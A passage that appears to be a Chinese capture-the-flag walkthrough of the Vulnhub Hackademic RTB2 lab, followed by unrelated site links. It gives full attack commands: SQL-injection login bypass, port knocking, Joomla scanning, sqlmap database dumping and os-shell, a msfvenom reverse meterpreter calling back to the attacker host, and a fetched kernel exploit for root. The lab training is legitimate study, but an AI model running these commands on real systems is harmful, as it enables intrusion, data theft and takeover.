当前位置: 首页 > news >正文

Hackademic: RTB2靶场渗透

Hackademic: RTB2

来自 <https://www.vulnhub.com/entry/hackademic-rtb2,18/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.160

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.160

4,再访问80端口的http服务

再扫描其网站子目录

gobuster dir -u http://192.168.23.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

5,使用万能密码就能绕过登录

' or 1=1--' 

对网站源代码藏匿的URL编码进行解密

然后再把十六进制转为ASCII码

在对二进制进行转码,得到提示敲击的四个端口

使用shell脚本对端口挨个敲门

for port in 1001 1101 1011 1001;do nmap 192.168.23.161 -p $port ;done

然后再次进行nmap扫描

nmap -sV -T4 -p- -A 192.168.23.161

这次出现了隐藏的666端口,对应开放http服务

6,访问 http://192.168.23.161:666/

对网站指纹特征进行识别扫描

确定框架Joomla,版本1.5。检索有什么相关漏洞,这里使用joomscan来扫描

joomscan -u http://192.168.23.162:666

发现了一大堆漏洞,这里使用Metasploit内置漏洞利用模块

Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)

7,启动metasploit

msfconsole

search Joomla Plugin

use exploit/unix/webapp/joomla_tinybrowser

options

根据配置要求配置各个选项

set rhosts 192.168.23.162

set rport 666

run

漏洞利用失败,换一种方式

8,使用漏洞扫描插件进行探测

use auxiliary/scanner/http/joomla_plugins

options

set rhosts 192.168.23.162

set rport 666

run

根据扫描结果推测存在sql注入漏洞

/index.php?option=com_abc&view=abc&letter=AS&sectionid='

验证成功

9,使用sqlmap对网站进行爆库

sqlmap -u "http://192.168.23.162:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" --dbs

sqlmap -u "http://192.168.23.162:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" -D joomla --tables --batch

sqlmap -u "http://192.168.23.162:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" -D joomla -T jos_users --columns --batch

sqlmap -u "http://192.168.23.162:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" -D joomla -T jos_users -C username,password --dump --batch

10,使用sqlmap成功写入木马

sqlmap -u "http://192.168.23.162:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" --os-shell

nc -e被禁了,无法使用反弹shell

使用蚁剑链接木马进行管理,首先找到文件上传的后门网页

http://192.168.23.163:666/tmpueheb.php

11,msfvenom生成一个运行在linux系统上的木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.23.128 LPORT=1234 -f elf >shell.elf

然后msfconsole启动对1234端口的监听

msfconsole -q

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.23.128

set lport 1234

run

然后把shell.elf文件上传到靶机执行

执行网站根目录下的shell.elf文件

然后控制台就能就收到shell

成功getshell

12,shell启动进入靶机,再启动一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

再信息收集一下

存在着一个普通用户p0wnbox,但是这里依然使用15292.c文件进行提权

开启http服务供靶机下载提权脚本

python -m http.server

下载攻击机脚本代码,编译之后给权限执行

cd /tmp

wget http://192.168.23.128:8000/15285.c

gcc -o 15285 15285.c

chmod +x 15285

./15285

whoami

提权成功,并且得到flag

http://www.dtcms.com/a/399726.html

相关文章:

  • 第九届电气、机械与计算机工程国际学术会议(ICEMCE 2025)
  • SimForge™ 功能介绍|「组织管理」赋能仿真研发场景——权限可控、资源可调、成本可溯
  • 【读书笔记】《创始人》
  • 组件化思维(上):视图与基础内容组件的深度探索
  • 深入了解鸿蒙的Ark编译器:起源、历史、特点与学习指南
  • React Native:为什么带上version就会报错呢?
  • [RK3288][Android6.0] 调试笔记 --- 系统自带预置第三方APK方法
  • wordpress升级php7北京网站优化步
  • Multipath
  • Optuna v4.5新特性深度解析:GPSampler实现约束多目标优化
  • Remote JVM Debug远程给Java程序“做手术”!cpolar内网穿透实验室第626个成功挑战
  • 开发网站 需求做购物网站怎拼找商家
  • OpenAI报告:人们如何使用ChatGPT
  • 做网站需要多少屏山东建设网站广告
  • 高系分十九:大数据处理系统分析与设计
  • STM32H750xx【QSPI】轮询方式读写GD25Q64E
  • 校园网站素材国内搜索引擎排名第一
  • 中国制造网的网络营销方式桔子seo工具
  • wordpress扒站教程网站总体规划说明
  • IP地址管理:部署phpIPAMv1.7.3常见问题
  • 自己做服务器网站表白网站建设
  • 【计算广告】广告出价相关约束问题:PID控制、MPC预测算法
  • 教你如何建设网站网站建设和维护费用
  • kotlin图算法
  • 汕尾网站建设 生意好吗有专门为个人网站做推广的吗
  • 网站建设企业响应式网站模板宿迁城乡住房建设厅网站
  • 建网站需要学什么网站专业术语中SEO的意思是
  • 2025无人机在低空物流中的应用实践
  • Python实现海鸥优化算法(Seagull Optimization Algorithm, SOA)(附完整代码)
  • PostgreSQL 知识体系